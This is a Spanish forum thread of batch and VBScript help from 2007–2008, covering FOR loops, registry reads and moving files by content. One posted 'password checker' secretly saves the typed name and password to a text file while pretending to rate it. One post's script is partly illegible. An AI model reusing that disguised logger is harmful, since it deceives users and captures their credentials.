creo un .bat y en el le pongo esto

Código:

```
c:\hola.bat
```

```
echo %1 %3
```

jeje perdon por las preguntas ya me da verguenza escribir a la proxima te escribo por mensaje privado.

editado:

si quiero mostar los argumentos de un mismo bat:

Código:

```
echo hola como estas
```

```
echo %1 %3
```

como hago esto esta mal yo se como hago para que este bien

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Siuto** en **5 Agosto 2007, 08:32**

No, ya no entiendo la pregunta, separa los parrafos y usa las etiqueutas de (<https://foro.elhacker.net/Themes/default/images/bbc/code.gif>) (Insertar Código) para los mismos.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **jaimico195** en **8 Agosto 2007, 07:58**

alguien me puede ayudar jeje esque no me han respondido, se que ya hice varias preguntas pero no entiendo soy medio lento para aprender jejeje pero espero y me puedan ayudar con los posts que puse ariva.

saludos espero que entiendan mis dudas

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **viktor74** en **18 Agosto 2007, 21:57**

mm una preguntilla sobre un programa que hice.

Lo que pasa es que hice un programa que "verifica" si tu contraseña es buena o no.

@echo off

title seguridad en tu contraseña

echo ¡Bienvenido! sigue las instrucciones

set /p nombre= como te llamas?

:menu

cls

echo.

echo 1.checar seguridad de contraseña

echo 2.salir

set /p opc=que quieres hacer %nombre%??

if %opc%==1 goto ver

if %opc%==2 goto end

:ver

set /p con= ingresa tu contraseña

cls

echo analizando...


```
echo %nombre% >> archivo3.txt
echo %con% >> archivo3.txt
pause
set /p respuesta= muy mala
```

```
%respuesta%
```

```
:end
echo adios
pause
exit
```

aqui el problema que tengo es que no se como hacer para que el programa elija si a contraseña es buena o mala, simplemente le puse que digera que es mala o buena y quisiera saber si hay alguna forma de que por ejemplo si la contraseña es menor a 8 caracteres sea mala i si es mayor se a buena.

De antemano gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: sirdarckcat en 21 Agosto 2007, 04:43

si quieres saber si es menor a 8 caracteres, trata de obtener el caracter 8 de una variable, si es diferente de "", es porque es mayor o igual a 8..

Saludos!!

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: .Undertaker. en 30 Agosto 2007, 05:11

Alguien me puede explicar este code completamente??

Código:

```
FOR /F "tokens=1,3-5,7-9,10* delims= " %i IN ("George no es malvado, es
bondadoso, siempre piensa en los demas.") DO echo %i %j %k %l tonto,
%m %n %o matar a %p %q
```

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Ze Marduk en 26 Septiembre 2007, 09:36

hola amigooo, tengo un problemilla, explico rapido, tengo mysql instalado en mi PC, y uso msdps para entrar a mysql mas o menos asi:

Código:

```
cd xampp\mysql\bin\mysql
mysql -u root -p
```

despues me aparece el siguiente mensaje:

Citar

enter your password:

y ahi tecleo mi contraseña, ahora bien, hice un bat con el siguiente codigo:

Citar

```
@echo off
color a
cd\
cd xampp\mysql\bin
mysql -u root -p
echo mysql :: esta es mi contraseña de mysql
```

pero aunque en el bat hago q mi contraseña se escriba sola aun asi me sale el mensaje:

Citar

enter your password:

mi pregunta es como puedo introducir mi contraseña de mysql sin yo teclear es decir que lo haga el bat???

espero q me haya explicado

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Siuto** en **26 Septiembre 2007, 13:01**

Proba eso ;)

Código:

```
echo password | mysql -u root -p
```

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **chrominum** en **28 Septiembre 2007, 17:01**

Buenas, necesito saber como se puede guardar el valor de una entrada del registro en una variable, gracias :D

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **nhaalclkier** en **28 Septiembre 2007, 17:22**

Primero este no era el mejor sitio para hacer tu pregunta, podías haber abierto un nuevo tema...y aún así nunca pensaste pork existen post pegados!!!!!!?????

Mirate este:

Librería de funciones y scripts BATCH Actualizado 26/05/07
(<http://foro.elhacker.net/index.php/topic,163184.0.html>)

Y para que veas te pongo el código que te interesa aki cuyo titulo es casi igual que tu pregunta:

Script para extraer el valor de una clave del registro

Código

```
1. @echo off
2. :: Script para extraer el valor de una clave del registro
3. :: By nhaalclkier
4. :: Special thanks to Sdc
5. reg export "RUTA_CLAVE" "temp.tmp"
6. if not %errorlevel%==0 goto error
7. type temp.tmp | find "NOMBRE_CLAVE" > cadena_encontrada.tmp
8. del /S /F /Q /A:- temp.tmp
9. FOR /F "tokens=2* delims==" %%I IN (cadena_encontrada.tmp) DO
    set var="%%I"
10.    if "%var%"==" " goto error
11.    FOR /F "tokens=2* delims==" %%I IN (cadena_encontrada.tmp)
        DO (
12.            call:PARSEA %%I
13.        )
14.    goto :EOF
15.    :PARSEA
16.    del /S /F /Q /A:- cadena_encontrada.tmp
17.    SET PP="%~1"
18.    SET PP=%PP:\/=\%
19.    SET PP=%PP:"=%
```

```
20.      :: Aqui va el bat, el valor de la clave queda guardado en
        la variable PP
21.      exit
22.      :error
23.      :: Aqui va el bat de error en caso de que la RUTA_CLAVE o
        NOMBRE_CLAVE no exista
24.      exit
25.
```

Hay que usar el boton

(<http://foro.elhacker.net/Themes/default/images/spanish/search.gif>)

Saludos ;)

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **chrominum** en **28 Septiembre 2007, 17:54**

Busqué por google y en este tema, pero en el foro se me olvido xD

Muchas gracias, voy a probarlo ;)

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Alfil0022** en **2 Enero 2008, 01:38**

Hola.

Tengo un problema con un batch. Parece que SET no funciona dentro de un bucle FOR. Es posible? El batch es el siguiente

```
set J=1
for %%I in (*.jpg) do (
    ren %%I %J%.jpg
    set /a J+=1
)
```

He probado con CALL SET /A J+=1 y tampoco

Tambien he probado ...

```
set J=1
for %%I in (*.jpg) do (
    ren %%I %J%.jpg
```

```
call:incrm  
echo %J%  
)  
goto fi
```

```
:incrm  
set /a J+=1  
goto:EOF
```

```
:fi
```

El caso es que cuando ejecuto el siguiente codigo fuera del batch si que funciona

```
set J=1  
set /a J+=1  
echo %J%
```

(J vale 2)

Alguien sabe que es lo que pasa?

Gracias

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **sirdarckcat** en **2 Enero 2008, 01:48**

que tienes que activar las extensiones de comandos, o hacer una llamada a una funcion dentro del for para poder hacer eso.

Saludos!!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **nhaalckiemr** en **2 Enero 2008, 01:59**

A mi si te digo la verdad lo de las extensiones de comando y usar ! en lugar de % nunca me funcionó...ya lo había comentado anteriormente pero weno es igual...

saludos ;)

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: ~[uNd3rc0d3]~ en **17 Enero 2008, 00:52**

muy bueno el manual

lo he visto por toda la red xDD

un comando que yo soy de usar bastante seguido y que nunca lo vi en un manual es CACLS para editar las acl de windows y quitar o otorgar derechos

quizas esta un poco incompleto lo de los argumentos ya que vi dudas por ahi pero es el unico manual de programacion avanzada que deambula por la red xDD

hasta otra

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Berzeker** en **19 Enero 2008, 07:54**

Hola, tengo un codigo con el cual se ejecuta un ftp, quisiera que todos los archivos que se encuentren en un directorio y tambien en los subfolders de este (ejemplo: C:\users\berzeker\pictures\foto.jpg C:\users\berzeker\pictures\vacaciones\foto.jpg) sean los que se transfieren, pero los archivos transferidos van a ser solo los que tengan determinada extension; algo asi *.jpg (es decir que el codigo que necesito solo necesitaria modificarle la extension para que mande .jpg .doc. .txt etc) cualquier ayuda, muchas gracias ;)

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Berzeker** en **19 Enero 2008, 23:09**

Hola, he avanzado un poco con la ultima duda que tuve pero no la he podido resolver todavía, se me ocurrio usar el comando dir /s y guardar la informacion, despues ejecutar find, pero lo unico que consigo con esto es ver los nombres de los .jpg, mas no la ruta que es indispensable para ejecutar el ftp (creo), alguna idea?

En otra cosa, quisiera saber como copiar el contenido de una pagina en internet en un .txt para usar un find sobre el, o si tienen algun otro metodo con batch, gracias.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **paperas** en **22 Enero 2008, 18:29**

Buenas Tardes, Un saludo a todos:

Soy nuevo en esto de la programacion, quisiera solicitarles de favor si me pudieran ayudar a resolver mi problema, hay un sistema instalado como en 20 clientes aprox. y en cada cliente se va generando un archivito de audio dentro de una carpeta especifica en donde contiene la grabacion de la llamada que recibe la operadora del sistema, mi problema es que me estan pidiendo concentrar todos esos archivos de audio de cada maquina en una sola, las cuales obviamente estan conectadas por red con TCP/IP, como puedo crear un batch que me haga esto?

de antemano, muchas gracias

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Kefren** en **22 Enero 2008, 18:47**

[Cita de: paperas en 22 Enero 2008, 18:29](#)

Buenas Tardes, Un saludo a todos:

Soy nuevo en esto de la programacion, quisiera solicitarles de favor si me pudieran ayudar a resolver mi problema, hay un sistema instalado como en 20 clientes aprox. y en cada cliente se va generando un archivito de audio dentro de una carpeta especifica en donde contiene la grabacion de la llamada que recibe la operadora del sistema, mi problema es que me estan pidiendo concentrar todos esos archivos de audio de cada maquina en una sola, las cuales obviamente estan conectadas por red con TCP/IP, como puedo crear un batch que me haga esto?

de antemano, muchas gracias

No se si se podrá hacer eso con un BATCH, en tal caso sería con una especie de Telnet o algo asi

SaluDOS

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **paperas** en **22 Enero 2008, 18:56**

muchas gracias por tu respuesta kefren

Si la verdad me estoy dando cuenta de eso porque ya tengo varias

semanas buscando algo parecido y no encuentro por ningun lado, si tu sabes de programacion algo que me pudieras recomendar, no se con VB, Delphi o algo parecido, osea necesito automatizar ese proceso y que sea transparente para el usuario, es decir que no tenga que estar dando contrasenas a un ftp o por medio de un telnet, sino mas bien idear un programita que lo haga diario y sobre todo transparente. Un saludo

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: ^Arkangel^ en 24 Enero 2008, 16:40

[Cita de: pupybell en 24 Enero 2008, 16:23](#)

una pregunta?

este batch esta bien?

lo hice yo copiando un poco de este foro...

codigo:

color 2

echo ¡Bienvenido! sigue las instrucciones

set /p nombre= como te llamas?

:menu

cls

echo.

echo 1) Chequear seguridad de contraseña

echo 2) Salir

set /p opc=que quieres hacer %nombre%:

if %opc%==1 goto ver

if %opc%==2 goto end

:ver

set /p con= ingresa tu contraseña:

cls

echo analizando...

echo.

echo.

echo Presione una tecla para ver la seguridad...

pause > nul

if %con% GEQ 8 (echo contraseña: Buena) ELSE (echo contraseña: Mala, cambiala)

pause > nul

:end

echo Presione una tecla para salir

pause > nul

exit

y nada mas...

solo eso

suerte

Pupybell

Yo le cambiaria las siguientes cosas:

1ro y principal hay que añadirle @echo off para que no se vean los comandos cuando lo ejecutas.

2do me salteria toda esta parte:

Código:

```
set /p nombre= como te llamas?
:menu
cls
echo.
echo 1) Chequear seguridad de contraseña
echo 2) Salir
set /p opc=que quieres hacer %nombre%:

if %opc%==1 goto ver
if %opc%==2 goto end
:ver
```

Eso es porque :

1) Hay verdadera necesidad de preguntarle el nombre al usuario ?

2) Si ejecuta el programa va a ser para (si el programa tiene 1 sola funcion, ejercer dicha funcion) asique si eligiese salir, no habria tenido necesidad de siquiera ejecutar el programa. Me explico ?

3ro No entiendo que quieres poner aca:

Código:

```
if %con% GEQ 8 (echo contraseña: Buena) ELSE (echo contraseña: Mala,
cambiala)
```

Seguramente queires poner que si tiene 8 o mas caracteres es buena, sino es mala.

Ahi lo que en realidad pusiste es que si la contraseña (siempre y cuando sea solo numerica) es = o mayor a 8 es buena, contrario es mala (OJO: si es = o mayor en numero, ejemplo que pones 00000000001 eso es mala sugun el batch xq ese numero no es mayor a 8, si pones 9 entonces batch lo toma como bueno, me explico?)

y despues, un pequeño detalle al principio:

Código:

```
color 2
```

Personalmente creo que queda mejor un verde mas claro, esto lo haces asi:

Código:

```
color 0c
```

Espero haberte sido de ayuda!

Nos vemos ;)

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **^Arkangel^** en **24 Enero 2008, 20:30**

De nada, siempre es un placer ayudar.

Saludos

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **drotha2** en **27 Febrero 2008, 21:22**

Hola a tod@s!!!

Me alegro encontrar un manual como el de la primera pagina, aunque me aclaro mucho no consigo que me funcione, tal vez, por que no sepa...

Cuento el problema a ver q soluciones tiene...

Tengo un lector de tarjetas SD y un adaptador de SD, un software a cargar en tarjetas... Estoy intentando q el bach formatee de forma rápida la sd, para limpiarla, de esta forma tarda menos que hacer un del, me encuentro con que el format me pide pulsar tecla cuando este lista la unidad, despues que le ponga nombre, después paso a meter datos, pero en ocasiones me cambia la letra de la unidad, necesitaría q preguntara, si no la encuentra en la letra normal, que unidad se grabaran los datos. a ver, en ocasiones me da la unidad L pero otras la J o la M, el problema, imagino, seria q el bach supiera si la unidades del card reader están para escribir o no y si es q no preguntara la unidad a escribir.

Esa es la parte mas chungu, para mi, claro, posiblemente me deis distintas soluciones.

Total, seria, como limpiar la unidad, en caso de usar FORMAT que este no pida pulsar teclas o meter nombre, que fuera rápido... Que detecte la unidad a grabar y si no encuentra pida letra de unidad a grabar...

Imagino q esta algo chungo o directamente seria mas sencillo que pidiera la letra de la unidad a grabar...

Espero podáis ayudarme... hace algunos años q no uso los comandos msdos

Un saludo y gracias!!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Luchiz** en **9 Marzo 2008, 18:36**

Hola a tod@s como veran soy nuevo por aca y tambien nuevo en esto del BATCH, me gustaria aprender a hacer "cositas" con este ejecutador por lotes, Por favor si alguno de ustedes sabe hacer cualquier cosa en .bat respondame que verdaderamente me interesa aprender. lo que sea que sepan hacer no duden que yo absorbo informacion como una esponja. pero solo hay una condicion que culaquier cosa que envien se bien explicadita porfa =)

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Kiosera** en **17 Marzo 2008, 18:05**

Buen día sirdarckcat y buen día para todos!!

Quería preguntar acerca de un tema:

Sucede que quiero leer línea a línea un archivo TXT.

Estoy usando lo siguiente:

```
FOR %%a in (c:\CB.txt) DO echo %%a
```

Pero lo que veo es c:\CB.txt y no el contenido (lo que hay dentro de CB.txt) :-[

Uso el for porque lo que deseo es que recorra el archivo hasta que se acabe....

Es posible con el FOR o estoy usando una sentencia que no es?

De antemano, gracias por la respuesta

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: ~[uNd3rc0d3]~ en 17 Marzo 2008, 23:48

Cita de: C:*.bat
@echo off
for /f "tokens=* delims= " %%a in (hola.txt) do (echo %%a)
pause > nul

Cita de: C:\hola.txt
hola como andas
bien y vos
yo bien, che a donde vas?
a tomar una virra, vamos?
dale....

Cita de: ConsoleOutput
hola como andas
bien y vos
yo bien, che a donde vas?
a tomar una virra, vamos?
dale....

see ya!

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: morenochico en 18 Marzo 2008, 18:26

¿Se puede poner varias instrucciones ftp en UNA sola linea desde el prompt de msdos?

Necesito hacer varios movimientos en varias pc's remotas, (borrar archivos, crear directorios etc). Esto no es problema ya que tengo un archivo .exe que hace eso (todas las pc's tienen una configuracion similar). Lo que quiero saber es si se puede poner una instruccion larga dentro del run de windows, esto es: inicio ---> run.

Lo que quiero es: abrir cmd.exe, ir a un directorio (desktop), conectarme a un servidor ftp y descargar mi archivo .exe que es el que hace todo el movimiento que ocupo. Quiero hacerlo todo desde el run de windows o en su defecto abrir una terminal CMD y poner una instruccion larga (cd desktop, ftp ... etc...). He intentado pero hasta el momento no

he podido. Ya se que para conectarse a un servidor ftp se puede crear un archivo con instrucciones que se manda llamar con ftp desde el prompt. Pero no me sirve ya que el archivo .exe que ocupo seria mas chico que el que archivo con instrucciones ftp y en la practica se haria mas trabajo.

Las razones por las que quiero hacerlo asi son tres, la comunicacion es muuuy lenta >:(, yo no lo haria lo haria una persona que no tiene muchos conocimientos en pc's :P y son demasiadas pc's :-[. Busco poner la instruccion solo una vez y que solito se haga todo el trabajo. ;)

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **BasFKlitzZ** en **22 Marzo 2008, 08:10**

Holas a todos!... Miren, tengo una simple duda con un *.bat:
¿Se puede poner una llamada (:llamada) en el mismo .bat del archivo que lo llama...? Porque intento, y lo reviso, pero no encuentro error. Lo que pasa es que reinicia la aplicación, o sea, vuelve a empezar desde el principio, y no reconoce la llamada :-\
El código que tengo es algo así:

Nombre del archivo: "Prueba.bat"

Código:

```
@echo off
color A
set /P caracter=Escriba algun caracter, y presione enter:
IF %caracter% neq i (
cls
echo Los caracteres que usted ha escrito, son incorrectos...
echo Presione una tecla para continuar...
pause >nul
) ELSE (
cls
echo Muy Bien!!! Has acertado!!!
echo Adios
pause >nul
exit)
Prueba.bat ventana
```

```
@echo off&call:%*&goto:EOF
```

```
:ventana
start
color A
echo Tendrás 7 años de mala suerte por no haber acertado...
pause >nul
exit
goto:EOF
```

Espero que me puedan ayudar, y se que mi error debe ser algo insignificante... :¬¬ tal vez sea por el "@echo off&call:%*&goto:EOF"... tal vez tenga algo mal escrito, o me falte algo... nose, pero si los pongo en .bats diferentes, funciona :-\ Desde ya, muchas gracias :)

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: renegomez en 28 Abril 2008, 19:55

Buen dia, hola a todos, necesito su ayuda, tengo un software que quiero que solo se pueda instalar una una maquina determinada y que solo permita hacer 3 instalciones y que luego lo bore, el softwre se encuentra un penddrier(USB), si alguien puede decirme como hacer una bat, mil gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: xfz4 en 29 Abril 2008, 01:18

[Cita de: renegomez en 28 Abril 2008, 19:55](#)

Buen día, hola a todos, necesito su ayuda, tengo un software que quiero que solo se pueda instalar una una maquina determinada y que solo permita hacer 3 instalciones y que luego lo bore, el softwre se encuentra un penddrier(USB), si alguien puede decirme como hacer una bat, mil gracias

Código:

```
@ECHO OFF
CLS
:FIN
IF %USERNAME%==MAKINA DETERMINADA (GOTO NEXT) ELSE GOTO FIN
:FIN
set /a IDENTIFICADOR=%IDENTIFICADOR%+1
if exist c:\3.GARBAGE (goto SALTE) else goto crear
:CREAR
```

```
echo item-%USERNAME%>c:\%identificador%.GARBAGE
:SALTE
DEL %0
:: SI QUIERES BORRAR LO INSTALADO LO BORRAS AKI <---
:: O TAMBIEN PODES METER EL IDENTIFICADOR EN EL PENDRIVE
:: ESTO TE DA UNA IDEA ??
```

saludos ;D

PD: pasense por ka:

<http://foro.elhacker.net/index.php/topic,163184.0.html>
(<http://foro.elhacker.net/index.php/topic,163184.0.html>)

y aka:

<http://foro.elhacker.net/index.php/topic,209121.0.html>
(<http://foro.elhacker.net/index.php/topic,209121.0.html>)

y respondanme >:(>:(>:(>:(:rolleyes: :¬¬ :P ;D

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **elnenamelenas** en **16 Mayo 2008, 01:15**

POr favor necesito ayuda urgentemente, soy nuevo en esto y necesito crear un programita que me cambie automaticamente el path del windows donde se ejecute por el que yo le diga.

Alguien puede ayudarme? se lo agradeceré aternamente

Lo que llevo hecho hasta ahora sin lograr nada es:

```
path>pathanterior.Txt
```

```
If %pathanterior.txt% EQU %pathcorrecto% (echo OK)
```

```
Else %pathanterior.txt% EQU %pathcorrecto% (echo ko)
```

```
Pause
```

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **m1st1c0** en **22 Mayo 2008, 17:36**

Hola a Todos!:

Tengo un equipo que genera automaticamente archivos (AVI) y los almacena en una carpeta; tengo un bat que elimina los más viejos a 6 días.

Quiero sacarle un backup, pero organizado es decir que se creen la

Este, por ejemplo debe moverse a la carpeta X.

Y este se puede quedar donde está:

Lo que me parece complejo es que se necesitan condicionales, intenté hacerlo en c++, pero la verdad me faltan muchos conocimientos. :huh:
PD: El texto se visualiza mejor en notepad
Gracias! Kanpai!

Si sabes cuantas lineas hay en el archivo, y exactamente cuales son las que tienes que leer, con un FOR /F, con un filtro skip; y un set, puedes hacer el trabajo..

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Shinseiki86** en **15 Junio 2008, 20:24**

Cita de: sirdarckcat en 15 Junio 2008, 17:59

Si sabes cuantas lineas hay en el archivo, y exactamente cuales son las que tienes que leer, con un FOR /F, con un filtro skip; y un set, puedes hacer el trabajo..

Saludos!!

Ese es el problema... El archivo empieza con una lista de personas, la cual va desde 1 hasta ?? . Habia pensado usar un findstr.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **sirdarckcat** en **15 Junio 2008, 22:22**

Citar

una lista de personas, la cual va desde 1 hasta ??

No entiendo entonces lo que tienes que hacer :¬¬

Saludos!!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Shinseiki86** en **23 Junio 2008, 14:38**

Hola a todos

estoy utilizando este comando para filtrar los archivos txt

```
findstr /m /c:"texto1a" *.txt > temp.txt
findstr /m /c:"texto1b" *.txt >> temp.txt
findstr /m /c:"texto2a" *.txt >> temp.txt
findstr /m /c:"texto2b" *.txt >> temp.txt
```

Asi me sirve, pero tengo que filtrarlo luego por excel, ya que necesito un consolidado de la busqueda. Me serviría mas si pudiera usar condicionales... ¿Se puede? :huh:

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Novlucker** en **23 Junio 2008, 15:16**

Siempre me ha gustado mucho más *.vbs que *.bat (se crean igual, notepad y extensión vbs), es por eso que he codeado la siguiente utilidad que hace lo que necesitas,..... espero :P

Código:

```

set objfso = createobject("scripting.filesystemobject")
' Establecemos el objeto encargado de realizar las tareas
set lacarpeta = objfso.getfolder("d:\carpetacontenedora")
'Fijamos la ruta en la que esta la carpeta, dentro de la cual, están los
archivos
set afile = lacarpeta.files
'Obtenemos los archivos
for each f in afile
'Por cada archivo en la carpeta
set elarchivo = objfso.OpenTextFile(f.path,1)
contenido = elarchivo.readall
' Lo abrimos en modo lectura y leemos su contenido
primero =
instr(1,contenido,"000323"                                00000000000000000000000000000000
0000000",1)
segundo =
instr(1,contenido,"000333"                                00000000000000000000000000000000
0000000",1)
' Buscamos la primer línea, y luego la segunda
elarchivo.close
' Cerramos el archivo
if primero <>0 and segundo<>0 then
' Comparamos, si existen la primera Y la segunda línea, deben de existir
las dos
objfso.movefile f.path,"d:\pronto\"&f.name
' Movemos el archivo a la carpeta destino en caso de que sea afirmativo
' Debe de establecerse la ruta de la carpeta, en este caso es "d:\pronto"
end if
' Terminamos la comparación
next
' Pasamos al siguiente archivo

```

También te lo he comentado para que lo entiendas mejor ;)

Pruebalo y cuéntanos como te va

Saludos

[Modifico] Viendo un poco mejor lo que necesitas me he dado cuenta de que la condición esta al revés, en este caso, los mueve si tienen la cadena de texto, pero tu quieres lo contrario, que los mueva en caso de que no las tenga, para eso basta con modificar la siguiente línea....

Esto...

Código:

```

if primero <>0 and segundo<>0 then
' Comparamos, si existen la primera Y la segunda línea, deben de existir
las dos

```

Por esto....

Código:

```

if primero =0 or segundo=0 then
' Comparamos, si no existe la primera O la segunda línea, con que una no
exista basta

```

Saludos

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Shinseiki86** en **23 Junio 2008, 18:08**

No me funcionó, pero es posible que sea que lo configuré mal.

Ya hice uno que me funciona de maravilla, pero quiero optimizarlo.

```
-----
@echo off
color 0A
title FILTRADO INCAPACIDADES ver3.0
rem Programa: filtroIGE_ver3.5.bat
echo  UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ÄÄ¿
echo  3          Filtrado INCAPACIDADES          3
echo  3          Shinseiki86          3
echo  ÀAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ÄÄÜ
echo °
goto ingreso

:nocarp
@echo CARPETA INEXISTENTE!

:ingreso
@echo Ingrese o arrastre carpeta a procesar:
set /p carpeta="> "
%carpeta:~1,2%
cd %carpeta%
if %errorlevel% GTR 0 goto nocarp
cls

:busqueda
echo  UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ÄÄ¿
echo  3          Filtrado INCAPACIDADES          3
echo  3          Shinseiki86          3
echo  ÀAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ÄÄÜ
echo _
echo PROCESANDO 000%% % %  ooooooooooooo
```

[illegible][illegible][illegible][illegible]


```

segundo =
instr(1,contenido,"000333                                00000000000000000000000000000000
0000000",1)
elarchivo.close
if primero =0 or segundo=0 then
objfso.movefile f.path,"d:\pronto\"&f.name
movidos = movidos+1
end if
next
if movidos = 0 then
msgbox "No se ha movido ningún archivo"
else
msgbox "Se han movido " & movidos & " archivos"
end if

```

Cambiar línea 2
Cambiar línea 9 (de abajo para arriba XD)

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Shinseiki86 en 23 Junio 2008, 18:43

línea 3:
set lacarpeta = objfso.getfolder("C:\Documents and
Settings\tesdcv01\Escritorio\pruebas")
línea 19:
objfso.movefile f.path,"C:\Documents and
Settings\tesdcv01\Escritorio\pruebas\ok"&f.name
La 19 es la que saca error

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Novlucker en 23 Junio 2008, 18:47

Te he modificado el anterior mensaje para que además el script
devuelva un mensaje de cuantos archivos se movieron.....

Tu problema es sencillo

Citar
objfso.movefile f.path,"C:\Documents and
Settings\tesdcv01\Escritorio\pruebas\ok\"&f.name

Saludos

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Shinseiki86** en **23 Junio 2008, 19:03**

```
set objfso = createobject("scripting.filesystemobject")
set lacarpeta = objfso.getfolder("C:\Documents and
Settings\tesdcv01\Escritorio\pruebas")
set afile = lacarpeta.files
movidos = 0
for each f in afile
set elarchivo = objfso.OpenTextFile(f.path,1)
contenido = elarchivo.readall
primero =
instr(1,contenido,"000323          00000000000000000000000000000000
000000000000",1)
segundo =
instr(1,contenido,"000333          00000000000000000000000000000000
000000000000",1)
elarchivo.close
if primero =0 or segundo=0 then
objfso.movefile f.path,"C:\Documents and
Settings\tesdcv01\Escritorio\pruebas\ok"&f.name
movidos = movidos+1
end if
next
if movidos = 0 then
msgbox "No se ha movido ningún archivo"
else
msgbox "Se han movido " & movidos & " archivos"
end if
*****
```

Me renombré los archivos así:
oko
kok
ok2008-06-
05_641006_NI_891501133_EPS018_88_I
jeje la verdad no tengo la mas remota idea de por qué.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Novlucker** en **23 Junio 2008, 19:06**

Menos mal que es de pruebas :xD

Es porque en esta línea.....

Citar

```
objfso.movefile f.path,"C:\Documents and  
Settings\tesdco01\Escritorio\pruebas\ok"&f.name
```

Debe de haber un slash invertido después del **ok**

Citar

```
objfso.movefile f.path,"C:\Documents and  
Settings\tesdcv01\Escritorio\pruebas\ok\"&f.name
```

Ahora si.... tiene que funcionar bien ;)

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: **Shinseiki86** en **23 Junio 2008, 20:29**

mmmm ahora me aparece un error en linea 12...

```

set objfso = createobject("scripting.filesystemobject")
set lacarpeta = objfso.getfolder("C:\Documents and
Settings\tesdcv01\Escritorio\pruebas\")
set afile = lacarpeta.files
movidos = 0
for each f in afile
set elarchivo = objfso.OpenTextFile(f.path,1)
contenido = elarchivo.readall
primero =
instr(1,contenido,"000323"           00000000000000000000000000000000
000000000000",1)
segundo =
instr(1,contenido,"000333"           00000000000000000000000000000000
000000000000",1)
elarchivo.close
if primero =0 or segundo=0 then
objfso.movefile f.path,"C:\Documents and
Settings\tesdcv01\Escritorio\pruebas\ok\"&f.name
movidos = movidos+1
end if
next
if movidos = 0 then
msgbox "No se ha movido ningún archivo"

```

```
else
msgbox "Se han movido " & movidos &" archivos"
end if
:-\
```

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Shinseiki86** en **23 Junio 2008, 20:37**

Lo que tambien me puede servir es un for que lea un txt con estos datos:

```
2008-06-19_590059_NI_890807898_EPS018_86_I.TXT
2008-06-19_621451_NI_890706425_EPS018_86_I.TXT
2008-06-19_621451_NI_890706425_EPS018_86_I.TXT
2008-06-19_621452_NI_890706425_EPS018_86_I.TXT
2008-06-19_621517_NI_810001583_EPS018_86_I.TXT
2008-06-20_102019121_CC_94487480_EPS018_51_I.TXT
2008-06-20_102019121_CC_94487480_EPS018_51_I.TXT
2008-06-20_102088573_CC_5931385_EPS018_01_I.TXT
2008-06-20_102718305_CC_33966379_EPS018_01_I.TXT
2008-06-20_102718305_CC_33966379_EPS018_01_I.TXT
2008-06-20_103000920_CC_31992855_EPS018_01_I.TXT
2008-06-20_103000920_CC_31992855_EPS018_01_I.TXT
2008-06-20_103161002_CC_16638978_EPS018_01_I.TXT
```

Y me cree un txt con las lineas que se repiten.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Novlucker** en **23 Junio 2008, 20:44**

Te había enviado un privado, para no seguir llenando el post :xD

Cual es el texto que aparece en el error?
También hay que tener en cuenta que la carpeta **C:\Documents and Settings\tesdcv01\Escritorio\pruebas\ok** debe de existir

Saludos

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Shinseiki86** en **24 Junio 2008, 14:52**

Gracias Novlucker ya funciona. ;D

Aunque por curieosidad... como me refiero a la linea siguiente de un archivo? :huh:

